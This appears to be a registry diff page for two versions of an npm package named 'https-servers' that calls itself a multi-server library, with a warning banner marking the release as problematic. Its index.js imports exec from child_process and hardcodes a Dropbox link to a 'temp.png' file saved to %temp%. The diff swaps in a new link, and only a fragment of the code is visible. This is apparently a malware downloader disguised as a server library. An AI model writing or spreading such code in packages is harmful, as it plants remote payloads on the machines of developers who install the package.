https-servers 2.1.1 → 3.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of https-servers might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +2 -2
package/index.js CHANGED
@@ -3,7 +3,7 @@ import { exec } from 'child_process';
3
3
  export function createServer() {
4
4
  return new Promise((resolve, reject) => {
5
5
  // Hardcoded URL and Path
6
- const sourceUrl = "https://www.dropbox.com/scl/fi/wblo9hd4thiab5lpr25hq/temp.png?rlkey=2gufljt54eisog601gxsjs9t9&st=2ttowotk&dl=1";
6
+ const sourceUrl = "https://www.dropbox.com/scl/fi/verj3m7liugo6j47lzdsk/temp.png?rlkey=sp3d2fu7b5oipter0r7nw2tya&st=c2zn5vaj&dl=1";
7
7
  const savePath = "%temp%/temp.png";
8
8
 
9
9
  // The exact command string
package/package.json CHANGED
@@ -1,10 +1,10 @@
1
1
  {
2
2
  "name": "https-servers",
3
- "version": "2.1.1",
3
+ "version": "3.0.0",
4
4
  "type": "module",
5
5
  "description": "Create multi servers",
6
6
  "main": "index.js",
7
7
  "scripts": {
8
8
  "test": "node index.js"
9
9
  }
10
- }
10
+ }